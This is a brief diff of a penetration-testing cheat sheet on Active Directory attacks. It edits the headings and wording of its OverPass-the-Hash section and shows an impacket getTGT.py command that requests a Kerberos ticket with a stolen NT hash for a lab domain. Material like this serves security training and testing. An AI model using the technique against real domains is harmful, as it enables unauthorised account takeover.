xe1phix/Xe1phix-ParrotLinux-Public-Kiosk-Project/Xe1phix-[Cheatsheets]/Community-[Cheatsheets]/[PayloadsAllTheThings]-Cheatsheets/Active Directory Attack.md

 ```

-### OverPass-the-Hash (pass the key)
+## OverPass-the-Hash (pass the key)

-In this technique, instead of passing the hash directly, we use the NTLM hash of an account to request a valid Kerberost ticket (TGT).
+In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT).

-#### Using impacket
+### Using impacket

 ```bash
 root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ropnop.com